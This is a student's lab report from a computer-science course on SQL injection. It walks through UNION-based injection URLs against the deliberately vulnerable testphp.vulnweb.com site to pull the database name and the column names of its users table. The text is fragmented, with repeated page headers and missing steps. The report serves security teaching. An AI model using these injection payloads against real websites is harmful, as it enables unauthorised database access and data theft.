Wms 2.1
Wms 2.1
20CSP-338
Submitted for the requirement of
Lab Course
ii
Akshat Chauhan
20BCS5931
Experiment-2.1
2. Objective:
3. TOOLS TO BE USED:
(i) SQLMAP
(ii) Acunetix
(iii) Windows 7
Introduction: SQL Injection (SQLi) is a type of an injection attack that makes it possible
to execute malicious SQL statements. These statements control a database server behind a
web application. Attackers can be use SQL Injection vulnerabilities to bypass application
security measures. They can go around authentication and authorization of a web page or
web application and retrieve the content of the entire SQL database. They can also use SQL
Injection to add, modify, and delete records in the database.
• Go to http://testphp.vulnweb.com/listproducts.php?cat=1
ii
Akshat Chauhan
20BCS5931
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING
EXPERIMENT-1.4
2. Go to http://testphp.vulnweb.com/listproducts.php?cat=1
1
Akshat Chauhan
20BCS5931
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING
5. Information gathering
● To check the database name, Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10, database()—
Akshat Chauhan
3 20BCS5931
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING
● Column name:
http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,
4,5,6,7,8,9,10,group_concat(column_name)%20from%20information_schema.col
umns%20where%20table_name= 0x7573657273
Output:
In the above screenshots you can see we have got an error message which means the running
site is infected by SQL injection. Maybe we can get some important data from the users' table,
so let’s penetrate more inside. Again Use the Concat function for table users for retrieving its
entire column names. We successfully retrieve all eight column names from inside the table
users.
Evaluation Grid (To be created per the SOP and Assessment guidelines):